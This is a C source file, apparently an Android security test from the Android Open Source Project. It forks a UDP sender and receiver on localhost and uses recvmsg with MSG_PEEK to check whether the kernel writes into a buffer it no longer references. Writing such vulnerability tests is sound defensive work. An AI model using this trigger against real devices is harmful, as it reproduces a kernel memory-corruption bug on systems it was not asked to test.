| /** |
| * Copyright (C) 2018 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| #include <sys/types.h> |
| #include <sys/wait.h> |
| #include <arpa/inet.h> |
| #include <netinet/in.h> |
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <string.h> |
| #include <sys/socket.h> |
| #include <sys/wait.h> |
| #include <unistd.h> |
| |
| #define EVIL_STRING "123456789\x00OVERWRITE\x00" |
| int udp_send() |
| { |
| int s; |
| struct sockaddr_in6 addr; |
| char data[160]; |
| s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP); |
| memset(&addr, 0, sizeof(addr)); |
| addr.sin6_family = AF_INET6; |
| addr.sin6_port = htons(43786); |
| inet_pton(AF_INET6, "::1", &(addr.sin6_addr)); |
| sendto(s, "data", 4, 0, (struct sockaddr*)&addr, sizeof(addr)); |
| memset(data, 0, sizeof(data)); |
| memcpy(data, EVIL_STRING, sizeof(EVIL_STRING)); |
| sendto(s, data, sizeof(data), 0, (struct sockaddr*)&addr, sizeof(addr)); |
| return 0; |
| } |
| |
| int udp_recv() |
| { |
| int s; |
| struct sockaddr_in6 addr; |
| struct msghdr msg; |
| struct iovec iov[2]; |
| char buf1[10], buf2[10], buf3[10]; |
| |
| s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP); |
| memset(&addr, 0, sizeof(addr)); |
| addr.sin6_family = AF_INET6; |
| addr.sin6_port = htons(43786); |
| inet_pton(AF_INET6, "::", &(addr.sin6_addr)); |
| bind(s, (struct sockaddr*)&addr, 128); |
| |
| memset(buf1, 0, sizeof(buf1)); |
| memset(buf2, 0, sizeof(buf2)); |
| memset(buf3, 0, sizeof(buf3)); |
| memset(iov, 0, sizeof(iov)); |
| memset(&msg, 0, sizeof(msg)); |
| msg.msg_iov = iov; |
| msg.msg_iovlen = 2; |
| iov[0].iov_base = buf1; |
| iov[0].iov_len = sizeof(buf1); |
| iov[1].iov_base = buf2; |
| iov[1].iov_len = sizeof(buf2); |
| recvmsg(s, &msg, 0); |
| |
| memset(buf1, 0, sizeof(buf1)); |
| memset(buf2, 0, sizeof(buf2)); // buf2 is zeroed here. |
| memset(buf3, 0, sizeof(buf3)); |
| memset(iov, 0, sizeof(iov)); |
| memset(&msg, 0, sizeof(msg)); |
| msg.msg_iov = iov; |
| msg.msg_iovlen = 1; |
| iov[0].iov_base = buf3; |
| iov[0].iov_len = sizeof(buf3); |
| recvmsg(s, &msg, MSG_PEEK); // No refrence to buf2 in this call. |
| |
| printf("%s\n", buf2); // If buf2 has contents OVERWRITE, a vuln has occured. |
| return 0; // Exploit must occur in a forked process, return 113 won't work here. |
| } |
| |
| int main() |
| { |
| pid_t send, recv; |
| int status = 0; |
| if ((recv = fork()) == 0) |
| exit(udp_recv()); |
| sleep(1); |
| if ((send = fork()) == 0) |
| exit(udp_send()); |
| for (pid_t pid = wait(&status); pid > 0; pid = wait(&status)); |
| } |